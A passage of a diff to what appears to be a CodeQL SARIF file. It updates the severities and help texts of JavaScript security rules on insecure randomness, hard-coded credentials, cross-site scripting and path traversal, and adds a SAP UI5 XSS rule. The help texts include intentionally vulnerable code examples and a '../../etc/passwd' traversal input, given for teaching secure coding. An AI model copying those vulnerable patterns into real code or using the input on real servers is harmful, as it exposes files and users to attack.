Thus the modulo operator is used on a uniformly random number between 0 and 249, which results in a uniformly random digit between 0 and 9.\n\n\n```javascript\nconst crypto = require('crypto');\n\nconst digits = [];\nwhile (digits.length < 10) {\n const byte = crypto.randomBytes(1)[0];\n if (byte >= 250) {\n continue;\n }\n digits.push(byte % 10); // OK\n}\n```\n\n## References\n* Stack Overflow: [Understanding “randomness”](https://stackoverflow.com/questions/3956478/understanding-randomness).\n* OWASP: [Insecure Randomness](https://owasp.org/www-community/vulnerabilities/Insecure_Randomness).\n* OWASP: [Rule - Use strong approved cryptographic algorithms](https://cheatsheetseries.owasp.org/cheatsheets/Cryptographic_Storage_Cheat_Sheet.html#rule---use-strong-approved-authenticated-encryption).\n* Common Weakness Enumeration: [CWE-327](https://cwe.mitre.org/data/definitions/327.html).\n" }, "properties" : { "tags" : [ "security", "external/cwe/cwe-327" ], "description" : "Some mathematical operations on random numbers can cause bias in\n the results and compromise security.", "id" : "js/biased-cryptographic-random", "kind" : "problem", - "name" : "Creating biased random numbers from a cryptographically secure source.", + "name" : "Creating biased random numbers from a cryptographically secure source", "precision" : "high", "problem.severity" : "warning", "security-severity" : "7.5" 
@@ -1113,8 +880,8 @@ "level" : "warning" }, "help" : { - "text" : "# Hard-coded credentials\nIncluding unencrypted hard-coded authentication credentials in source code is dangerous because the credentials may be easily discovered. For example, the code may be open source, or it may be leaked or accidentally revealed, making the credentials visible to an attacker. This, in turn, might enable them to gain unauthorized access, or to obtain privileged information.\n\n\n## Recommendation\nRemove hard-coded credentials, such as user names, passwords and certificates, from source code. Instead, place them in configuration files, environment variables or other data stores if necessary. If possible, store configuration files including credential data separately from the source code, in a secure location with restricted access.\n\n\n## Example\nThe following code example connects to an HTTP request using an hard-codes authentication header:\n\n\n```javascript\nlet base64 = require('base-64');\n\nlet url = 'http://example.org/auth';\nlet username = 'user';\nlet password = 'passwd';\n\nlet headers = new Headers();\n\nheaders.append('Content-Type', 'text/json');\nheaders.append('Authorization', 'Basic' + base64.encode(username + \":\" + password));\n\nfetch(url, {\n method:'GET',\n headers: headers\n })\n.then(response => response.json())\n.then(json => console.log(json))\n.done();\n\n```\nInstead, user name and password can be supplied through the environment variables `username` and `password`, which can be set externally without hard-coding credentials in the source code.\n\n\n```javascript\nlet base64 = require('base-64');\n\nlet url = 'http://example.org/auth';\nlet username = process.env.USERNAME;\nlet password = process.env.PASSWORD;\n\nlet headers = new Headers();\n\nheaders.append('Content-Type', 'text/json');\nheaders.append('Authorization', 'Basic' + base64.encode(username + \":\" + password));\n\nfetch(url, {\n method:'GET',\n headers: headers\n })\n.then(response 
=> response.json())\n.then(json => console.log(json))\n.done();\n\n```\n\n## Example\nThe following code example connects to a Postgres database using the `pg` package and hard-codes user name and password:\n\n\n```javascript\nconst pg = require(\"pg\");\n\nconst client = new pg.Client({\n user: \"bob\",\n host: \"database.server.com\",\n database: \"mydb\",\n password: \"correct-horse-battery-staple\",\n port: 3211\n});\nclient.connect();\n\n```\nInstead, user name and password can be supplied through the environment variables `PGUSER` and `PGPASSWORD`, which can be set externally without hard-coding credentials in the source code.\n\n\n## References\n* OWASP: [Use of hard-coded password](https://www.owasp.org/index.php/Use_of_hard-coded_password).\n* Common Weakness Enumeration: [CWE-259](https://cwe.mitre.org/data/definitions/259.html).\n* Common Weakness Enumeration: [CWE-321](https://cwe.mitre.org/data/definitions/321.html).\n* Common Weakness Enumeration: [CWE-798](https://cwe.mitre.org/data/definitions/798.html).\n", - "markdown" : "# Hard-coded credentials\nIncluding unencrypted hard-coded authentication credentials in source code is dangerous because the credentials may be easily discovered. For example, the code may be open source, or it may be leaked or accidentally revealed, making the credentials visible to an attacker. This, in turn, might enable them to gain unauthorized access, or to obtain privileged information.\n\n\n## Recommendation\nRemove hard-coded credentials, such as user names, passwords and certificates, from source code. Instead, place them in configuration files, environment variables or other data stores if necessary. 
If possible, store configuration files including credential data separately from the source code, in a secure location with restricted access.\n\n\n## Example\nThe following code example connects to an HTTP request using an hard-codes authentication header:\n\n\n```javascript\nlet base64 = require('base-64');\n\nlet url = 'http://example.org/auth';\nlet username = 'user';\nlet password = 'passwd';\n\nlet headers = new Headers();\n\nheaders.append('Content-Type', 'text/json');\nheaders.append('Authorization', 'Basic' + base64.encode(username + \":\" + password));\n\nfetch(url, {\n method:'GET',\n headers: headers\n })\n.then(response => response.json())\n.then(json => console.log(json))\n.done();\n\n```\nInstead, user name and password can be supplied through the environment variables `username` and `password`, which can be set externally without hard-coding credentials in the source code.\n\n\n```javascript\nlet base64 = require('base-64');\n\nlet url = 'http://example.org/auth';\nlet username = process.env.USERNAME;\nlet password = process.env.PASSWORD;\n\nlet headers = new Headers();\n\nheaders.append('Content-Type', 'text/json');\nheaders.append('Authorization', 'Basic' + base64.encode(username + \":\" + password));\n\nfetch(url, {\n method:'GET',\n headers: headers\n })\n.then(response => response.json())\n.then(json => console.log(json))\n.done();\n\n```\n\n## Example\nThe following code example connects to a Postgres database using the `pg` package and hard-codes user name and password:\n\n\n```javascript\nconst pg = require(\"pg\");\n\nconst client = new pg.Client({\n user: \"bob\",\n host: \"database.server.com\",\n database: \"mydb\",\n password: \"correct-horse-battery-staple\",\n port: 3211\n});\nclient.connect();\n\n```\nInstead, user name and password can be supplied through the environment variables `PGUSER` and `PGPASSWORD`, which can be set externally without hard-coding credentials in the source code.\n\n\n## References\n* OWASP: [Use of hard-coded 
password](https://www.owasp.org/index.php/Use_of_hard-coded_password).\n* Common Weakness Enumeration: [CWE-259](https://cwe.mitre.org/data/definitions/259.html).\n* Common Weakness Enumeration: [CWE-321](https://cwe.mitre.org/data/definitions/321.html).\n* Common Weakness Enumeration: [CWE-798](https://cwe.mitre.org/data/definitions/798.html).\n" + "text" : "# Hard-coded credentials\nIncluding unencrypted hard-coded authentication credentials in source code is dangerous because the credentials may be easily discovered. For example, the code may be open source, or it may be leaked or accidentally revealed, making the credentials visible to an attacker. This, in turn, might enable them to gain unauthorized access, or to obtain privileged information.\n\n\n## Recommendation\nRemove hard-coded credentials, such as user names, passwords and certificates, from source code. Instead, place them in configuration files, environment variables or other data stores if necessary. If possible, store configuration files including credential data separately from the source code, in a secure location with restricted access.\n\nIf the credentials are a placeholder value, make sure the value is obviously a placeholder by using a name such as `\"SampleToken\"` or `\"MyPassword\"`.\n\n\n## Example\nThe following code example connects to an HTTP request using an hard-codes authentication header:\n\n\n```javascript\nlet base64 = require('base-64');\n\nlet url = 'http://example.org/auth';\nlet username = 'user';\nlet password = 'passwd';\n\nlet headers = new Headers();\n\nheaders.append('Content-Type', 'text/json');\nheaders.append('Authorization', 'Basic' + base64.encode(username + \":\" + password));\n\nfetch(url, {\n method:'GET',\n headers: headers\n })\n.then(response => response.json())\n.then(json => console.log(json))\n.done();\n\n```\nInstead, user name and password can be supplied through the environment variables `username` and `password`, which can be set externally without 
hard-coding credentials in the source code.\n\n\n```javascript\nlet base64 = require('base-64');\n\nlet url = 'http://example.org/auth';\nlet username = process.env.USERNAME;\nlet password = process.env.PASSWORD;\n\nlet headers = new Headers();\n\nheaders.append('Content-Type', 'text/json');\nheaders.append('Authorization', 'Basic' + base64.encode(username + \":\" + password));\n\nfetch(url, {\n method:'GET',\n headers: headers\n })\n.then(response => response.json())\n.then(json => console.log(json))\n.done();\n\n```\n\n## Example\nThe following code example connects to a Postgres database using the `pg` package and hard-codes user name and password:\n\n\n```javascript\nconst pg = require(\"pg\");\n\nconst client = new pg.Client({\n user: \"bob\",\n host: \"database.server.com\",\n database: \"mydb\",\n password: \"correct-horse-battery-staple\",\n port: 3211\n});\nclient.connect();\n\n```\nInstead, user name and password can be supplied through the environment variables `PGUSER` and `PGPASSWORD`, which can be set externally without hard-coding credentials in the source code.\n\n\n## References\n* OWASP: [Use of hard-coded password](https://www.owasp.org/index.php/Use_of_hard-coded_password).\n* Common Weakness Enumeration: [CWE-259](https://cwe.mitre.org/data/definitions/259.html).\n* Common Weakness Enumeration: [CWE-321](https://cwe.mitre.org/data/definitions/321.html).\n* Common Weakness Enumeration: [CWE-798](https://cwe.mitre.org/data/definitions/798.html).\n", + "markdown" : "# Hard-coded credentials\nIncluding unencrypted hard-coded authentication credentials in source code is dangerous because the credentials may be easily discovered. For example, the code may be open source, or it may be leaked or accidentally revealed, making the credentials visible to an attacker. 
This, in turn, might enable them to gain unauthorized access, or to obtain privileged information.\n\n\n## Recommendation\nRemove hard-coded credentials, such as user names, passwords and certificates, from source code. Instead, place them in configuration files, environment variables or other data stores if necessary. If possible, store configuration files including credential data separately from the source code, in a secure location with restricted access.\n\nIf the credentials are a placeholder value, make sure the value is obviously a placeholder by using a name such as `\"SampleToken\"` or `\"MyPassword\"`.\n\n\n## Example\nThe following code example connects to an HTTP request using an hard-codes authentication header:\n\n\n```javascript\nlet base64 = require('base-64');\n\nlet url = 'http://example.org/auth';\nlet username = 'user';\nlet password = 'passwd';\n\nlet headers = new Headers();\n\nheaders.append('Content-Type', 'text/json');\nheaders.append('Authorization', 'Basic' + base64.encode(username + \":\" + password));\n\nfetch(url, {\n method:'GET',\n headers: headers\n })\n.then(response => response.json())\n.then(json => console.log(json))\n.done();\n\n```\nInstead, user name and password can be supplied through the environment variables `username` and `password`, which can be set externally without hard-coding credentials in the source code.\n\n\n```javascript\nlet base64 = require('base-64');\n\nlet url = 'http://example.org/auth';\nlet username = process.env.USERNAME;\nlet password = process.env.PASSWORD;\n\nlet headers = new Headers();\n\nheaders.append('Content-Type', 'text/json');\nheaders.append('Authorization', 'Basic' + base64.encode(username + \":\" + password));\n\nfetch(url, {\n method:'GET',\n headers: headers\n })\n.then(response => response.json())\n.then(json => console.log(json))\n.done();\n\n```\n\n## Example\nThe following code example connects to a Postgres database using the `pg` package and hard-codes user name and 
password:\n\n\n```javascript\nconst pg = require(\"pg\");\n\nconst client = new pg.Client({\n user: \"bob\",\n host: \"database.server.com\",\n database: \"mydb\",\n password: \"correct-horse-battery-staple\",\n port: 3211\n});\nclient.connect();\n\n```\nInstead, user name and password can be supplied through the environment variables `PGUSER` and `PGPASSWORD`, which can be set externally without hard-coding credentials in the source code.\n\n\n## References\n* OWASP: [Use of hard-coded password](https://www.owasp.org/index.php/Use_of_hard-coded_password).\n* Common Weakness Enumeration: [CWE-259](https://cwe.mitre.org/data/definitions/259.html).\n* Common Weakness Enumeration: [CWE-321](https://cwe.mitre.org/data/definitions/321.html).\n* Common Weakness Enumeration: [CWE-798](https://cwe.mitre.org/data/definitions/798.html).\n" }, "properties" : { "tags" : [ "security", "external/cwe/cwe-259", "external/cwe/cwe-321", "external/cwe/cwe-798" ], @@ -1259,7 +1026,7 @@ "name" : "Client-side cross-site scripting", "precision" : "high", "problem.severity" : "error", - "security-severity" : "6.1" + "security-severity" : "7.8" } }, { "id" : "js/reflected-xss", @@ -1286,7 +1053,7 @@ "name" : "Reflected cross-site scripting", "precision" : "high", "problem.severity" : "error", - "security-severity" : "6.1" + "security-severity" : "7.8" } }, { "id" : "js/html-constructed-from-input", @@ -1340,7 +1107,7 @@ "name" : "Stored cross-site scripting", "precision" : "high", "problem.severity" : "error", - "security-severity" : "6.1" + "security-severity" : "7.8" } }, { "id" : "js/zipslip", 
@@ -1383,8 +1150,8 @@ "level" : "error" }, "help" : { - "text" : "# Uncontrolled data used in path expression\nAccessing files using paths constructed from user-controlled data can allow an attacker to access unexpected resources. This can result in sensitive information being revealed or deleted, or an attacker being able to influence behavior by modifying unexpected files.\n\n\n## Recommendation\nValidate user input before using it to construct a file path, either using an off-the-shelf library like the `sanitize-filename` npm package, or by performing custom validation.\n\nIdeally, follow these rules:\n\n* Do not allow more than a single \".\" character.\n* Do not allow directory separators such as \"/\" or \"\\\\\" (depending on the file system).\n* Do not rely on simply replacing problematic sequences such as \"../\". For example, after applying this filter to \".../...//\", the resulting string would still be \"../\".\n* Use a whitelist of known good patterns.\n\n## Example\nIn the first example, a file name is read from an HTTP request and then used to access a file. However, a malicious user could enter a file name which is an absolute path, such as `\"/etc/passwd\"`.\n\nIn the second example, it appears that the user is restricted to opening a file within the `\"user\"` home directory. However, a malicious user could enter a file name containing special characters. For example, the string `\"../../etc/passwd\"` will result in the code reading the file located at `\"/home/user/../../etc/passwd\"`, which is the system's password file. 
This file would then be sent back to the user, giving them access to all the system's passwords.\n\n\n```javascript\nvar fs = require('fs'),\n http = require('http'),\n url = require('url');\n\nvar server = http.createServer(function(req, res) {\n let path = url.parse(req.url, true).query.path;\n\n // BAD: This could read any file on the file system\n res.write(fs.readFileSync(path));\n\n // BAD: This could still read any file on the file system\n res.write(fs.readFileSync(\"/home/user/\" + path));\n});\n\n```\n\n## References\n* OWASP: [Path Traversal](https://owasp.org/www-community/attacks/Path_Traversal).\n* npm: [sanitize-filename](https://www.npmjs.com/package/sanitize-filename) package.\n* Common Weakness Enumeration: [CWE-22](https://cwe.mitre.org/data/definitions/22.html).\n* Common Weakness Enumeration: [CWE-23](https://cwe.mitre.org/data/definitions/23.html).\n* Common Weakness Enumeration: [CWE-36](https://cwe.mitre.org/data/definitions/36.html).\n* Common Weakness Enumeration: [CWE-73](https://cwe.mitre.org/data/definitions/73.html).\n* Common Weakness Enumeration: [CWE-99](https://cwe.mitre.org/data/definitions/99.html).\n", - "markdown" : "# Uncontrolled data used in path expression\nAccessing files using paths constructed from user-controlled data can allow an attacker to access unexpected resources. This can result in sensitive information being revealed or deleted, or an attacker being able to influence behavior by modifying unexpected files.\n\n\n## Recommendation\nValidate user input before using it to construct a file path, either using an off-the-shelf library like the `sanitize-filename` npm package, or by performing custom validation.\n\nIdeally, follow these rules:\n\n* Do not allow more than a single \".\" character.\n* Do not allow directory separators such as \"/\" or \"\\\\\" (depending on the file system).\n* Do not rely on simply replacing problematic sequences such as \"../\". 
For example, after applying this filter to \".../...//\", the resulting string would still be \"../\".\n* Use a whitelist of known good patterns.\n\n## Example\nIn the first example, a file name is read from an HTTP request and then used to access a file. However, a malicious user could enter a file name which is an absolute path, such as `\"/etc/passwd\"`.\n\nIn the second example, it appears that the user is restricted to opening a file within the `\"user\"` home directory. However, a malicious user could enter a file name containing special characters. For example, the string `\"../../etc/passwd\"` will result in the code reading the file located at `\"/home/user/../../etc/passwd\"`, which is the system's password file. This file would then be sent back to the user, giving them access to all the system's passwords.\n\n\n```javascript\nvar fs = require('fs'),\n http = require('http'),\n url = require('url');\n\nvar server = http.createServer(function(req, res) {\n let path = url.parse(req.url, true).query.path;\n\n // BAD: This could read any file on the file system\n res.write(fs.readFileSync(path));\n\n // BAD: This could still read any file on the file system\n res.write(fs.readFileSync(\"/home/user/\" + path));\n});\n\n```\n\n## References\n* OWASP: [Path Traversal](https://owasp.org/www-community/attacks/Path_Traversal).\n* npm: [sanitize-filename](https://www.npmjs.com/package/sanitize-filename) package.\n* Common Weakness Enumeration: [CWE-22](https://cwe.mitre.org/data/definitions/22.html).\n* Common Weakness Enumeration: [CWE-23](https://cwe.mitre.org/data/definitions/23.html).\n* Common Weakness Enumeration: [CWE-36](https://cwe.mitre.org/data/definitions/36.html).\n* Common Weakness Enumeration: [CWE-73](https://cwe.mitre.org/data/definitions/73.html).\n* Common Weakness Enumeration: [CWE-99](https://cwe.mitre.org/data/definitions/99.html).\n" + "text" : "# Uncontrolled data used in path expression\nAccessing files using paths constructed from 
user-controlled data can allow an attacker to access unexpected resources. This can result in sensitive information being revealed or deleted, or an attacker being able to influence behavior by modifying unexpected files.\n\n\n## Recommendation\nValidate user input before using it to construct a file path.\n\nThe validation method you should use depends on whether you want to allow the user to specify complex paths with multiple components that may span multiple folders, or only simple filenames without a path component.\n\nIn the former case, a common strategy is to make sure that the constructed file path is contained within a safe root folder. First, normalize the path using `path.resolve` or `fs.realpathSync` to remove any \"..\" segments. You should always normalize the file path since an unnormalized path that starts with the root folder can still be used to access files outside the root folder. Then, after you have normalized the path, check that the path starts with the root folder.\n\nIn the latter case, you can use a library like the `sanitize-filename` npm package to eliminate any special characters from the file path. Note that it is *not* sufficient to only remove \"../\" sequences: for example, applying this filter to \".../...//\" would still result in the string \"../\".\n\nFinally, the simplest (but most restrictive) option is to use an allow list of safe patterns and make sure that the user input matches one of these patterns.\n\n\n## Example\nIn the first (bad) example, the code reads the file name from an HTTP request, then accesses that file within a root folder. 
A malicious user could enter a file name containing \"../\" segments to navigate outside the root folder and access sensitive files.\n\n\n```javascript\nconst fs = require('fs'),\n http = require('http'),\n url = require('url');\n\nconst ROOT = \"/var/www/\";\n\nvar server = http.createServer(function(req, res) {\n let filePath = url.parse(req.url, true).query.path;\n\n // BAD: This function uses unsanitized input that can read any file on the file system.\n res.write(fs.readFileSync(ROOT + filePath, 'utf8'));\n});\n```\nThe second (good) example shows how to avoid access to sensitive files by sanitizing the file path. First, the code resolves the file name relative to a root folder, normalizing the path and removing any \"../\" segments in the process. Then, the code calls `fs.realpathSync` to resolve any symbolic links in the path. Finally, the code checks that the normalized path starts with the path of the root folder, ensuring the file is contained within the root folder.\n\n\n```javascript\nconst fs = require('fs'),\n http = require('http'),\n path = require('path'),\n url = require('url');\n\nconst ROOT = \"/var/www/\";\n\nvar server = http.createServer(function(req, res) {\n let filePath = url.parse(req.url, true).query.path;\n\n // GOOD: Verify that the file path is under the root directory\n filePath = fs.realpathSync(path.resolve(ROOT, filePath));\n if (!filePath.startsWith(ROOT)) {\n res.statusCode = 403;\n res.end();\n return;\n }\n res.write(fs.readFileSync(filePath, 'utf8'));\n});\n```\n\n## References\n* OWASP: [Path Traversal](https://owasp.org/www-community/attacks/Path_Traversal).\n* npm: [sanitize-filename](https://www.npmjs.com/package/sanitize-filename) package.\n* Common Weakness Enumeration: [CWE-22](https://cwe.mitre.org/data/definitions/22.html).\n* Common Weakness Enumeration: [CWE-23](https://cwe.mitre.org/data/definitions/23.html).\n* Common Weakness Enumeration: [CWE-36](https://cwe.mitre.org/data/definitions/36.html).\n* Common 
Weakness Enumeration: [CWE-73](https://cwe.mitre.org/data/definitions/73.html).\n* Common Weakness Enumeration: [CWE-99](https://cwe.mitre.org/data/definitions/99.html).\n", + "markdown" : "# Uncontrolled data used in path expression\nAccessing files using paths constructed from user-controlled data can allow an attacker to access unexpected resources. This can result in sensitive information being revealed or deleted, or an attacker being able to influence behavior by modifying unexpected files.\n\n\n## Recommendation\nValidate user input before using it to construct a file path.\n\nThe validation method you should use depends on whether you want to allow the user to specify complex paths with multiple components that may span multiple folders, or only simple filenames without a path component.\n\nIn the former case, a common strategy is to make sure that the constructed file path is contained within a safe root folder. First, normalize the path using `path.resolve` or `fs.realpathSync` to remove any \"..\" segments. You should always normalize the file path since an unnormalized path that starts with the root folder can still be used to access files outside the root folder. Then, after you have normalized the path, check that the path starts with the root folder.\n\nIn the latter case, you can use a library like the `sanitize-filename` npm package to eliminate any special characters from the file path. Note that it is *not* sufficient to only remove \"../\" sequences: for example, applying this filter to \".../...//\" would still result in the string \"../\".\n\nFinally, the simplest (but most restrictive) option is to use an allow list of safe patterns and make sure that the user input matches one of these patterns.\n\n\n## Example\nIn the first (bad) example, the code reads the file name from an HTTP request, then accesses that file within a root folder. 
A malicious user could enter a file name containing \"../\" segments to navigate outside the root folder and access sensitive files.\n\n\n```javascript\nconst fs = require('fs'),\n http = require('http'),\n url = require('url');\n\nconst ROOT = \"/var/www/\";\n\nvar server = http.createServer(function(req, res) {\n let filePath = url.parse(req.url, true).query.path;\n\n // BAD: This function uses unsanitized input that can read any file on the file system.\n res.write(fs.readFileSync(ROOT + filePath, 'utf8'));\n});\n```\nThe second (good) example shows how to avoid access to sensitive files by sanitizing the file path. First, the code resolves the file name relative to a root folder, normalizing the path and removing any \"../\" segments in the process. Then, the code calls `fs.realpathSync` to resolve any symbolic links in the path. Finally, the code checks that the normalized path starts with the path of the root folder, ensuring the file is contained within the root folder.\n\n\n```javascript\nconst fs = require('fs'),\n http = require('http'),\n path = require('path'),\n url = require('url');\n\nconst ROOT = \"/var/www/\";\n\nvar server = http.createServer(function(req, res) {\n let filePath = url.parse(req.url, true).query.path;\n\n // GOOD: Verify that the file path is under the root directory\n filePath = fs.realpathSync(path.resolve(ROOT, filePath));\n if (!filePath.startsWith(ROOT)) {\n res.statusCode = 403;\n res.end();\n return;\n }\n res.write(fs.readFileSync(filePath, 'utf8'));\n});\n```\n\n## References\n* OWASP: [Path Traversal](https://owasp.org/www-community/attacks/Path_Traversal).\n* npm: [sanitize-filename](https://www.npmjs.com/package/sanitize-filename) package.\n* Common Weakness Enumeration: [CWE-22](https://cwe.mitre.org/data/definitions/22.html).\n* Common Weakness Enumeration: [CWE-23](https://cwe.mitre.org/data/definitions/23.html).\n* Common Weakness Enumeration: [CWE-36](https://cwe.mitre.org/data/definitions/36.html).\n* Common 
Weakness Enumeration: [CWE-73](https://cwe.mitre.org/data/definitions/73.html).\n* Common Weakness Enumeration: [CWE-99](https://cwe.mitre.org/data/definitions/99.html).\n" }, "properties" : { "tags" : [ "security", "external/cwe/cwe-022", "external/cwe/cwe-023", "external/cwe/cwe-036", "external/cwe/cwe-073", "external/cwe/cwe-099" ], 
@@ -2555,34 +2322,7 @@ "name" : "Replacement of a substring with itself", "precision" : "very-high", "problem.severity" : "warning", - "security-severity" : "7.8" - } - }, { - "id" : "js/unsafe-external-link", - "name" : "js/unsafe-external-link", - "shortDescription" : { - "text" : "Potentially unsafe external link" - }, - "fullDescription" : { - "text" : "External links that open in a new tab or window but do not specify link type 'noopener' or 'noreferrer' are a potential security risk." - }, - "defaultConfiguration" : { - "enabled" : true, - "level" : "warning" - }, - "help" : { - "text" : "# Potentially unsafe external link\nHTML links that open in a new tab or window allow the target page to access the DOM of the origin page using `window.opener` unless link type `noopener` or `noreferrer` is specified. This is a potential security risk.\n\n\n## Recommendation\nSpecify the link type by adding an attribute `rel=\"noopener noreferrer\"`.\n\n\n## Example\nIn the following example, a JSX element is created that corresponds to an HTML link opening the URL `http://example.com` in a new tab. Since it does not specify a link type, that page will be able to access the DOM of the origin page.\n\n\n```javascript\nvar link = Example;\n\n```\nTo fix this vulnerability, add a `rel` attribute:\n\n\n```javascript\nvar link = Example;\n\n```\n\n## References\n* Mathias Bynens: [About rel=noopener](https://mathiasbynens.github.io/rel-noopener/).\n* Mozilla Developer Network: [HTML Anchor Element](https://developer.mozilla.org/en-US/docs/Web/HTML/Element/a).\n* Common Weakness Enumeration: [CWE-200](https://cwe.mitre.org/data/definitions/200.html).\n* Common Weakness Enumeration: [CWE-1022](https://cwe.mitre.org/data/definitions/1022.html).\n", - "markdown" : "# Potentially unsafe external link\nHTML links that open in a new tab or window allow the target page to access the DOM of the origin page using `window.opener` unless link type `noopener` or `noreferrer` is specified. 
This is a potential security risk.\n\n\n## Recommendation\nSpecify the link type by adding an attribute `rel=\"noopener noreferrer\"`.\n\n\n## Example\nIn the following example, a JSX element is created that corresponds to an HTML link opening the URL `http://example.com` in a new tab. Since it does not specify a link type, that page will be able to access the DOM of the origin page.\n\n\n```javascript\nvar link = Example;\n\n```\nTo fix this vulnerability, add a `rel` attribute:\n\n\n```javascript\nvar link = Example;\n\n```\n\n## References\n* Mathias Bynens: [About rel=noopener](https://mathiasbynens.github.io/rel-noopener/).\n* Mozilla Developer Network: [HTML Anchor Element](https://developer.mozilla.org/en-US/docs/Web/HTML/Element/a).\n* Common Weakness Enumeration: [CWE-200](https://cwe.mitre.org/data/definitions/200.html).\n* Common Weakness Enumeration: [CWE-1022](https://cwe.mitre.org/data/definitions/1022.html).\n" - }, - "properties" : { - "tags" : [ "maintainability", "security", "external/cwe/cwe-200", "external/cwe/cwe-1022" ], - "description" : "External links that open in a new tab or window but do not specify\n link type 'noopener' or 'noreferrer' are a potential security risk.", - "id" : "js/unsafe-external-link", - "kind" : "problem", - "name" : "Potentially unsafe external link", - "precision" : "very-high", - "problem.severity" : "warning", - "security-severity" : "6.5" + "security-severity" : "5.0" } }, { "id" : "js/regex/missing-regexp-anchor", @@ -2825,7 +2565,7 @@ "name" : "Log injection", "precision" : "medium", "problem.severity" : "error", - "security-severity" : "7.8" + "security-severity" : "6.1" } }, { "id" : "js/password-in-configuration-file", 
@@ -3056,7 +2796,7 @@ "enabled" : true }, "properties" : { - "tags" : [ "summary" ], + "tags" : [ "summary", "telemetry" ], "description" : "The total number of lines of JavaScript or TypeScript code across all files checked into the repository, except in `node_modules`. This is a useful metric of the size of a database. For all files that were seen during extraction, this query counts the lines of code, excluding whitespace or comments.", "id" : "js/summary/lines-of-code", "kind" : "metric", @@ -3075,7 +2815,7 @@ "enabled" : true }, "properties" : { - "tags" : [ "summary", "lines-of-code" ], + "tags" : [ "summary", "lines-of-code", "debug" ], "description" : "The total number of lines of JavaScript and TypeScript code from the source code directory,\n excluding auto-generated files and files in `node_modules`. This query counts the lines of code, excluding\n whitespace or comments.", "id" : "js/summary/lines-of-user-code", "kind" : "metric", 
@@ -3083,16 +2823,252 @@ } } ], "locations" : [ { - "uri" : "file:///opt/hostedtoolcache/CodeQL/2.15.1/x64/codeql/qlpacks/codeql/javascript-queries/0.8.1/", + "uri" : "file:///opt/hostedtoolcache/CodeQL/2.17.3/x64/codeql/qlpacks/codeql/javascript-queries/0.8.16/", + "description" : { + "text" : "The QL pack root directory." + } + }, { + "uri" : "file:///opt/hostedtoolcache/CodeQL/2.17.3/x64/codeql/qlpacks/codeql/javascript-queries/0.8.16/qlpack.yml", + "description" : { + "text" : "The QL pack definition file." + } + } ] + }, { + "name" : "advanced-security/javascript-sap-ui5-queries", + "semanticVersion" : "0.6.0+98e19b0e301f4a2867e6a5c7d8351765387cf40c", + "rules" : [ { + "id" : "js/ui5-xss", + "name" : "js/ui5-xss", + "shortDescription" : { + "text" : "UI5 Client-side cross-site scripting" + }, + "fullDescription" : { + "text" : "Writing user input directly to a UI5 View allows for a cross-site scripting vulnerability." + }, + "defaultConfiguration" : { + "enabled" : true, + "level" : "error" + }, + "help" : { + "text" : "# Client-side cross-site scripting\n\nReceiving text from the user, most notably through a control, and rendering it as HTML in another control can lead to a cross-site scripting vulnerability.\n\n## Recommendation\n\n### Preventing XSS Involving User Defined Control\n\nIf the XSS attack vector includes a user-defined control, then we can mitigate the issue by sanitizing the user-provided input in the implementation of the control:\n- Where possible, define the property type to something other than `string` or `any`. If a value should be used, then opt for the `enum` type which only allows a predefined set of strings.\n- Use escaping functions in `sap.base.security`. 
Relevant sanitizers include `encodeXML` and `encodeHTML`.\n- When using API with `apiVersion: 2` (Semantic Rendering), do not use `RenderManager.unsafeHtml` unless the control property `sanitizeContent` is set to `true`.\n- When using the now-deprecated older API with `RenderManager.write` or `RenderManager.writeAttribute`, use their respective counterparts `RenderManager.writeEscaped` and `RenderManager.writeAttributeEscaped` which sanitizes their rendered contents.\n\n### Preventing XSS Not Involving User Defined Control\n\nAn XSS attack vector can still exist even when no user-defined control is used. In this case, a model property or a control property act as an intermediate step when external data is passed in.\nIn this case, the UI5 application should not use the property as is, but should sanitize the contents before reading it. Such sanitization can take place in the controller or in the view declaration using expression bindings.\n\n## Example\n\n### Custom Control with Custom Rendering Method\n\nThis custom control `vulnerable.control.xss` calls `unsafeHtml` on a given `RenderManager` instance in its static renderer function. Since its `text` property is an unrestricted string type, it can point to a string with contents that can be interpreted as HTML. 
If it is the case, `unsafeHtml` will render the string, running a possibly embedded JavaScript code in it.\n\n```javascript\nsap.ui.define([\"sap/ui/core/Control\"], function (Control) {\n return Control.extend(\"vulnerable.control.xss\", {\n metadata: { properties: { text: { type: \"string\" } } },\n renderer: {\n apiVersion: 2,\n render: function (oRm, oControl) {\n oRm.openStart(\"div\", oControl);\n oRm.unsafeHtml(oControl.getText()); // sink\n oRm.close(\"div\");\n }\n }\n });\n})\n```\n\nThis is the same custom control without the possibility of XSS using several means of sanitization: The property `text` is enforced to a non-string type, hence disallows unrestricted strings (This is espcially applicable if the expected input is a number anyways). Also, the `sap.base.security.encodeXML` function is used to escape HTML control characters.\n\n```javascript\nsap.ui.define([\"sap/ui/core/Control\", \"sap/base/security/encodeXML\"], function (Control, encodeXML) {\n return Control.extend(\"vulnerable.control.xss\", {\n metadata: { properties: { text: { type: \"int\" } } }, // constrain the type\n renderer: {\n apiVersion: 2,\n render: function (oRm, oControl) {\n oRm.openStart(\"div\", oControl);\n oRm.unsafeHtml(encodeXML(oControl.getText()); // encode using security functions\n oRm.close(\"div\");\n }\n }\n });\n})\n```\n\n### Library Control\n\nThis example contains only library controls that are not user-defined. 
The untrusted user input flows from `sap.m.Input` and directly flows out via `sap.ui.core.HTML` through the model property `input` as declared in the `onInit` method of the controller.\n\n``` xml\n\n \t \n \n\n```\n\n``` javascript\nsap.ui.define([\"sap/ui/core/mvc/Controller\", \"sap/ui/model/json/JSONModel\"],\n function (Controller, JSONModel) {\n return Controller.extend(\"vulnerable.controller.app\", {\n onInit: function () {\n var oData = { input: null };\n var oModel = new JSONModel(oData);\n this.getView().setModel(oModel);\n },\n });\n },\n);\n```\n\nThe issue can be resolved by setting the `HTML` control's `sanitizeContent` attribute to true.\n\n``` xml\n\n \n \n\n```\n\n## References\n\n- OWASP: [DOM Based XSS](https://owasp.org/www-community/attacks/DOM_Based_XSS).\n- SAP UI5 Documentation: [Cross-site Scripting](https://sapui5.hana.ondemand.com/sdk/#/topic/91f0bd316f4d1014b6dd926db0e91070.html) in UI5.\n- SAP UI5 Documentation: [Prevention of Cross-site Scripting](https://sapui5.hana.ondemand.com/sdk/#/topic/4de64e2e191f4a7297d4fd2d1e233a2d.html) in UI5.\n- SAP UI5 Documentation: [API Documentation of sap.ui.core.RenderManager](https://sapui5.hana.ondemand.com/sdk/#/api/sap.ui.core.RenderManager).\n- SAP UI5 Documentation: [Defining Control Properties](https://sapui5.hana.ondemand.com/sdk/#/topic/ac56d92162ed47ff858fdf1ce26c18c4.html).\n- SAP UI5 Documentation: [Expression 